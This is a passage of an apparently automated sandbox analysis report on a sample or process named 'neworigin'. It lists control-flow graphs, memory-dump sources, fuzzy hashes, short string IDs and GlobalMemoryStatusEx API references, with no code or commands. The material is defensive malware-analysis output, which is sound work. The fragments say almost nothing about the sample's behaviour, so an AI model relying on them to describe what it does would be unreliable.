                                                                                                                                control_flow_graph 1825 6579241-6579275 1827 6579277-657927a 1825->1827 1828 6579280-6579295 1827->1828 1829 6579b38-6579b3b 1827->1829 1835 6579297-657929d 1828->1835 1836 65792ad-65792c3 1828->1836 1830 6579b61-6579b63 1829->1830 1831 6579b3d-6579b5c 1829->1831 1833 6579b65 1830->1833 1834 6579b6a-6579b6d 1830->1834 1831->1830 1833->1834 1834->1827 1838 6579b73-6579b7d 1834->1838 1839 65792a1-65792a3 1835->1839 1840 657929f 1835->1840 1843 65792ce-65792d0 1836->1843 1839->1836 1840->1836 1844 65792d2-65792d8 1843->1844 1845 65792e8-6579359 1843->1845 1846 65792dc-65792de 1844->1846 1847 65792da 1844->1847 1856 6579385-65793a1 1845->1856 1857 657935b-657937e 1845->1857 1846->1845 1847->1845 1862 65793a3-65793c6 1856->1862 1863 65793cd-65793e8 1856->1863 1857->1856 1862->1863 1868 6579413-657942e 1863->1868 1869 65793ea-657940c 1863->1869 1874 6579453-6579461 1868->1874 1875 6579430-657944c 1868->1875 1869->1868 1876 6579463-657946c 1874->1876 1877 6579471-65794eb 1874->1877 1875->1874 1876->1838 1883 65794ed-657950b 1877->1883 1884 6579538-657954d 1877->1884 1888 6579527-6579536 1883->1888 1889 657950d-657951c 1883->1889 1884->1829 1888->1883 1888->1884 1889->1888
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q
                                                                                                                                • API String ID: 0-127220927
                                                                                                                                • Opcode ID: 8ffc1f95bd15e542ff38619e4fb9fe768b58ed540ca6eb9e6fab7a2b269923b2
                                                                                                                                • Instruction ID: ea85cbc20400aeeedf14176e02d16ad737a23104f01b0abb0af048065700f0aa
                                                                                                                                • Opcode Fuzzy Hash: 8ffc1f95bd15e542ff38619e4fb9fe768b58ed540ca6eb9e6fab7a2b269923b2
                                                                                                                                • Instruction Fuzzy Hash: 02516F30B041169FDB55EB74E951BAEB7F6BB84204F108569C809EB395EB309C46CBA2

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1892 6574c78-6574cac 1894 6574cae-6574cb1 1892->1894 1895 6574cb3-6574ccd 1894->1895 1896 6574cd2-6574cd5 1894->1896 1895->1896 1897 65753b4-65753b6 1896->1897 1898 6574cdb-6574dd3 1896->1898 1899 65753bd-65753c0 1897->1899 1900 65753b8 1897->1900 1916 6574e56-6574e5d 1898->1916 1917 6574dd9-6574e26 call 6575531 1898->1917 1899->1894 1903 65753c6-65753d3 1899->1903 1900->1899 1918 6574e63-6574ed3 1916->1918 1919 6574ee1-6574eea 1916->1919 1930 6574e2c-6574e48 1917->1930 1936 6574ed5 1918->1936 1937 6574ede 1918->1937 1919->1903 1933 6574e53-6574e54 1930->1933 1934 6574e4a 1930->1934 1933->1916 1934->1933 1936->1937 1937->1919
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: fbq$XPbq
                                                                                                                                • API String ID: 0-2292610095
                                                                                                                                • Opcode ID: 6d816165cd41c59b40249969161c727ec7b3a160cc3a300530cb10f1eaa58d33
                                                                                                                                • Instruction ID: 8004a1958b07c6d28a62e727058cc5c9f3cb94ed50553a45319b75d1a31c70ce
                                                                                                                                • Opcode Fuzzy Hash: 6d816165cd41c59b40249969161c727ec7b3a160cc3a300530cb10f1eaa58d33
                                                                                                                                • Instruction Fuzzy Hash: 7C517130F002099FDB55DFB5C854BAEBBF6FF88710F208529E50AAB395DA749C058B91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1940 efef18-efef23 1941 efef4d-efef6c call efe680 1940->1941 1942 efef25-efef4c 1940->1942 1947 efef6e-efef71 1941->1947 1948 efef72-efefd1 1941->1948 1955 efefd7-eff064 GlobalMemoryStatusEx 1948->1955 1956 efefd3-efefd6 1948->1956 1960 eff06d-eff095 1955->1960 1961 eff066-eff06c 1955->1961 1961->1960
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2315440047.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_ef0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 85e3e4109fd12b38b3fa0956ec7a352abf5cb4b9ff5eb79978c1ae5ade3e2f79
                                                                                                                                • Instruction ID: f84f3f2e74777f1106459af801f68db702fee0e8868ad48b0143b4004290f9e2
                                                                                                                                • Opcode Fuzzy Hash: 85e3e4109fd12b38b3fa0956ec7a352abf5cb4b9ff5eb79978c1ae5ade3e2f79
                                                                                                                                • Instruction Fuzzy Hash: 91412272E003598BCB14DF79D8006EEBBF5EF89310F05856AD508A7251DB78A885CBE0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1964 efe680-eff064 GlobalMemoryStatusEx 1967 eff06d-eff095 1964->1967 1968 eff066-eff06c 1964->1968 1968->1967
                                                                                                                                APIs
                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,00EFEF6A), ref: 00EFF057
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2315440047.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_ef0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1890195054-0
                                                                                                                                • Opcode ID: 9b011f2fa3a0ee33623a08569408b5e0431689f4c7e38968c0d06463bb8d01f3
                                                                                                                                • Instruction ID: 93a6d8bd0a4241473d3ffa236e9381b4d13f037a42811020755b5a056af332aa
                                                                                                                                • Opcode Fuzzy Hash: 9b011f2fa3a0ee33623a08569408b5e0431689f4c7e38968c0d06463bb8d01f3
                                                                                                                                • Instruction Fuzzy Hash: AB1100B1C0065A9BCB10DF9AC544BAEFBF4EF48320F14856AE918B7241D778A940CFE5
                                                                                                                                APIs
                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,00EFEF6A), ref: 00EFF057
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2315440047.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_ef0000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1890195054-0
                                                                                                                                • Opcode ID: 0f5673f6c20d0005dd9b2bdd43e2f2c1052474fe65a656929616c71a47e0611f
                                                                                                                                • Instruction ID: a44e87da95d543dd480227a44cbd9dba0b5bc471f2f4481f97cd7b5b90128035
                                                                                                                                • Opcode Fuzzy Hash: 0f5673f6c20d0005dd9b2bdd43e2f2c1052474fe65a656929616c71a47e0611f
                                                                                                                                • Instruction Fuzzy Hash: 8E1103B1C0065A9FCB10CFAAD545BEEFBB4EF48310F14856AE818B7240D778A940CFA1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PH]q
                                                                                                                                • API String ID: 0-3168235125
                                                                                                                                • Opcode ID: 94b29d928973a4ea6d588e0addd96b3521c83954ca9610d7e4a1f6ae22584b1e
                                                                                                                                • Instruction ID: a405edea9c1fb60bafebf02d9dbc7883e53ad03a732966717a9d77d1515e77ac
                                                                                                                                • Opcode Fuzzy Hash: 94b29d928973a4ea6d588e0addd96b3521c83954ca9610d7e4a1f6ae22584b1e
                                                                                                                                • Instruction Fuzzy Hash: 5E41C270E0034ADFDB51DF65E850A9EBBB6FF85340F104A29D805EB240DBB1E946CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: PH]q
                                                                                                                                • API String ID: 0-3168235125
                                                                                                                                • Opcode ID: afd7fdaffad2446b50a898ad5b20782120966c98f5825e6c6c5d3f8c51a2a2fb
                                                                                                                                • Instruction ID: 8ad4ba67d157d826f051045b1c81f8f56bca09dd116e5f6c622bbcda16647fe4
                                                                                                                                • Opcode Fuzzy Hash: afd7fdaffad2446b50a898ad5b20782120966c98f5825e6c6c5d3f8c51a2a2fb
                                                                                                                                • Instruction Fuzzy Hash: 6E31E430B102058FDB49AB74E95466E77E7BF89210F204938D40AEB394DF35DE46CB95
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q
                                                                                                                                • API String ID: 0-1007455737
                                                                                                                                • Opcode ID: 4c6dcd3fda8d531586acbb64c624df4121957e0bed2db704c4dc51a5ed9dbacd
                                                                                                                                • Instruction ID: d8d40510930edc6c6a69f418ea00d401a6e1b96d3e4dc64e41b05d41fa04bec4
                                                                                                                                • Opcode Fuzzy Hash: 4c6dcd3fda8d531586acbb64c624df4121957e0bed2db704c4dc51a5ed9dbacd
                                                                                                                                • Instruction Fuzzy Hash: 97F0F431F042009FDFA49E48F98866873AAFB40218F044876D948CB280D7B1D905DB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d58d9e61b9a35c9623c35c4c6c5f8cd740fddf12c962bfbf4871eb1ff1157ace
                                                                                                                                • Instruction ID: 9f4d2f2b70f5a6c7cf13121c35286d3b3e192bb3d3d60a7f7397e0d043c62441
                                                                                                                                • Opcode Fuzzy Hash: d58d9e61b9a35c9623c35c4c6c5f8cd740fddf12c962bfbf4871eb1ff1157ace
                                                                                                                                • Instruction Fuzzy Hash: CC61D071F004114FDB54AA7AD88056FBADBAF94220B154479D80EDB364EE75DD028BD2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e03f2611b632f500fdfaa166cec8eec8788d267f001746d10093b02f4f06368e
                                                                                                                                • Instruction ID: 5c4d65f71fe43085f99efd33d9a887dc8c6a187dbf6c4904d8b1b70e64257591
                                                                                                                                • Opcode Fuzzy Hash: e03f2611b632f500fdfaa166cec8eec8788d267f001746d10093b02f4f06368e
                                                                                                                                • Instruction Fuzzy Hash: 55816D30B002098FDB85DFA9D4546AEB7F3BF88304F108528D50ADB395DB70DC468B92
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4a6740d2edc6e5e05eb03bc39ed22ecda918827204b0e52bf4cacf1f2e6f6232
                                                                                                                                • Instruction ID: 0cc0a8d58e46f00b224a97a69b0ec5a7d53ffcbe84a1c5c544404abffac03db4
                                                                                                                                • Opcode Fuzzy Hash: 4a6740d2edc6e5e05eb03bc39ed22ecda918827204b0e52bf4cacf1f2e6f6232
                                                                                                                                • Instruction Fuzzy Hash: 09913F34E106198FDF60DF68C890B9DB7B1FF89300F208599D549BB255DB70AA86CF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 43a269aa4697012f743e5690f08a9306c51f3e588638ecdcf8684b151cf26279
                                                                                                                                • Instruction ID: d521556951b0c6e2d191f711b8d05330fbb82e2bfb6306fb4846a6c0163e7f9e
                                                                                                                                • Opcode Fuzzy Hash: 43a269aa4697012f743e5690f08a9306c51f3e588638ecdcf8684b151cf26279
                                                                                                                                • Instruction Fuzzy Hash: 69913D34E106198BDF60DF68C890B9DB7B1FF89300F208599D54DBB255EB70AA86CF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f6c5b849d8df73fe5c5f24c22d2693eb1e85e2afd7815a7e693b2f2ffd89ffb7
                                                                                                                                • Instruction ID: 024ca76ddd1fa31f54fa3a88ba595d39dd0166230fcd28b46a34ea973f6d0eb3
                                                                                                                                • Opcode Fuzzy Hash: f6c5b849d8df73fe5c5f24c22d2693eb1e85e2afd7815a7e693b2f2ffd89ffb7
                                                                                                                                • Instruction Fuzzy Hash: AD714E34A002099FDB54DFA9D991AAEBBF6FF84300F148869E405EB355DB30ED46CB50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c7027471a364caef740264beaef09b89357f959d4870c1160606609ab66f9600
                                                                                                                                • Instruction ID: 7726408a4a942da459f6c79062085b49a56f2510f720e3fec7990eadb86be4ed
                                                                                                                                • Opcode Fuzzy Hash: c7027471a364caef740264beaef09b89357f959d4870c1160606609ab66f9600
                                                                                                                                • Instruction Fuzzy Hash: 3B713B74A002099FCB54DFA8D991AADBBF6FF88300F158969D419EB365DB30ED46CB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3e14abbf6e431757ca93f8097601d12092ff93e627c0d9d34558a13833b79ed0
                                                                                                                                • Instruction ID: 5b96addf194c6ecdc11e62079e9603edb11bb84ace4d61093ddc3d414761ddc9
                                                                                                                                • Opcode Fuzzy Hash: 3e14abbf6e431757ca93f8097601d12092ff93e627c0d9d34558a13833b79ed0
                                                                                                                                • Instruction Fuzzy Hash: 8E51ED70B142149FEF74A66CF95477F265EEB89300F104926E80EDB3D5CA6CCC4587A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fabdab233bdd53e4f7af62c7209ec3e2cee0afa2ae1cc76290598a20034c4fe2
                                                                                                                                • Instruction ID: eebc40bba4451f9eef5bba4df7dd06dfcf7743494205d43fb0c6b0cbf3fc8a50
                                                                                                                                • Opcode Fuzzy Hash: fabdab233bdd53e4f7af62c7209ec3e2cee0afa2ae1cc76290598a20034c4fe2
                                                                                                                                • Instruction Fuzzy Hash: EA51EB70B102048FEF74A66DF95472F265EE789350F204929D80EDB3D9CA68CC458BA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ab230f917916a4b6c5fd1b4e2a96545cb1de18624ecae3d6d628c347d206a804
                                                                                                                                • Instruction ID: de7ebc43b6bee7371d5cc207a687bdf21b4724851a3b220649ba75c88e1149a2
                                                                                                                                • Opcode Fuzzy Hash: ab230f917916a4b6c5fd1b4e2a96545cb1de18624ecae3d6d628c347d206a804
                                                                                                                                • Instruction Fuzzy Hash: 6F414271E006058FDF60CEA9E8C0AAFF7F2FB84310F10492AD556D7650EB35E9598B91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0f883b33039a69f99a7ce0ffc9a5890586d6ec143f5898fb6727c11a834d5f73
                                                                                                                                • Instruction ID: fdce0207a6a422e136bde7a86e2960710362cdbe0e2dfd19b23b2baa8a29c464
                                                                                                                                • Opcode Fuzzy Hash: 0f883b33039a69f99a7ce0ffc9a5890586d6ec143f5898fb6727c11a834d5f73
                                                                                                                                • Instruction Fuzzy Hash: BE315030E1020A9BCB59DF64D85469FB7B2FF89300F108529E906EB350DBB1A946CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 529e5255c3337a165f3243059baa74fcd7d07d628619e398bce890cc4b916b4f
                                                                                                                                • Instruction ID: b122c3c4fbb9ded47270b1dd1b50a8941c64eeb44f383095c1cf5c35dc023c53
                                                                                                                                • Opcode Fuzzy Hash: 529e5255c3337a165f3243059baa74fcd7d07d628619e398bce890cc4b916b4f
                                                                                                                                • Instruction Fuzzy Hash: F6317030E102099BCB59CFA5D85469EB7B6FF89300F10C929E906EB350DBB1AE46CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 52daa5e5cff5930dab2bb5b1dfdf31018bb8a6e248ad241c2e3cc2641e5f8c92
                                                                                                                                • Instruction ID: 907f5408e563259c012474d75c78ee48bce59d55d152b5739eaa3e1d348650dd
                                                                                                                                • Opcode Fuzzy Hash: 52daa5e5cff5930dab2bb5b1dfdf31018bb8a6e248ad241c2e3cc2641e5f8c92
                                                                                                                                • Instruction Fuzzy Hash: CE21BA75E01215AFDB50EF68E881AEEBBF5BB48710F108029E909EB390E731D951CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b62f232b959862d639a31fb7045933fa646a4f20257d7aabc528f28ff2efa30a
                                                                                                                                • Instruction ID: 6204df312008a39e7168c65780dca6b58efc44a45cf88a95338055a6382ac86e
                                                                                                                                • Opcode Fuzzy Hash: b62f232b959862d639a31fb7045933fa646a4f20257d7aabc528f28ff2efa30a
                                                                                                                                • Instruction Fuzzy Hash: 2121AE75F012159FDB50DF68E881AAEB7F5FB48310F104029E909EB340E731D941CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f13ea86ff67078bf99b48a1ff6d4667b575a64fbd8d7b61d0410174487096e46
                                                                                                                                • Instruction ID: d28e742e219b2294dff4b622c2b2c6010ee311690edbcd9d0a6628db9ce34506
                                                                                                                                • Opcode Fuzzy Hash: f13ea86ff67078bf99b48a1ff6d4667b575a64fbd8d7b61d0410174487096e46
                                                                                                                                • Instruction Fuzzy Hash: C0112660B102141BEF64A17DED54B3F168EDB86750F20482AF80EDB396C818CD4A43E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e88331859a5efb87228b376dae944162e436829f15d826e611efc79505c17d14
                                                                                                                                • Instruction ID: 210c6bafee8f926518fb39560891697e310ca266bd97636b3bf1aa2182106d24
                                                                                                                                • Opcode Fuzzy Hash: e88331859a5efb87228b376dae944162e436829f15d826e611efc79505c17d14
                                                                                                                                • Instruction Fuzzy Hash: 9A01D460B202145BEF64A1BDF95573F118EEBC5750F20483AE90ED7795CC58CC4647D6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: deaba53e670f3e1bfdfacdd367269725d507305260ad0d8904cb565552a1188c
                                                                                                                                • Instruction ID: ebbcb2ac4c14401c86349bf8a01f8f9f6edf647afb40acf33b4f3580e35d836a
                                                                                                                                • Opcode Fuzzy Hash: deaba53e670f3e1bfdfacdd367269725d507305260ad0d8904cb565552a1188c
                                                                                                                                • Instruction Fuzzy Hash: 6801F534B041500FDB65867DA804B1FBBDADBC6710F15843AF10DCB351DD64DC4687A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 680b6d574e9eaff4c4f999a391f99413f043e4fa8e9e6109f2108cb37885cd75
                                                                                                                                • Instruction ID: 6022bce0e75d7d809811ab3e29c837f3b7157307d0e55b5faacff42f9d9c23fd
                                                                                                                                • Opcode Fuzzy Hash: 680b6d574e9eaff4c4f999a391f99413f043e4fa8e9e6109f2108cb37885cd75
                                                                                                                                • Instruction Fuzzy Hash: 0711AD32B001299FDB94A668D8146AE73EAFBC8621F004539C90AEB344DF65DC028BD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c2109e5d4a4e4fbcef1d02eb6969e94c0c3bc458065336150501582e80e97d99
                                                                                                                                • Instruction ID: f36a4770d391e0f71e863acc220d361de97d4f693b9638d2c29d749e9b83e287
                                                                                                                                • Opcode Fuzzy Hash: c2109e5d4a4e4fbcef1d02eb6969e94c0c3bc458065336150501582e80e97d99
                                                                                                                                • Instruction Fuzzy Hash: AE012831B002154FCB66DABDE855F2BBBD6DBCA714F158869E109CB391DE20DC0687D1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 392491a901b4cefbd22dfddd77abc5fbcccf39aad17ce93d3f8e65700174532f
                                                                                                                                • Instruction ID: 03ed96673be129e4c72fdbd11d041130300d6bd3a297bcbefb0b0b845dacea6c
                                                                                                                                • Opcode Fuzzy Hash: 392491a901b4cefbd22dfddd77abc5fbcccf39aad17ce93d3f8e65700174532f
                                                                                                                                • Instruction Fuzzy Hash: 2621E2B5801259AFCB10CF9AD885ADEFBB4FF49310F10812AE918A7640C374A550CBA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 52f6b5d1ab449141f68d3374659ea2545dabfd8661e15a9cfade1c078d5c7e2d
                                                                                                                                • Instruction ID: 87c28e35327324121c5b7fadd07daebb8b72425e316b2d9a249816351fac775c
                                                                                                                                • Opcode Fuzzy Hash: 52f6b5d1ab449141f68d3374659ea2545dabfd8661e15a9cfade1c078d5c7e2d
                                                                                                                                • Instruction Fuzzy Hash: AB012835B042100FCBA2AA38F818B5F7BD6EFC6714F004839E54ACB391DE12EC468791
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
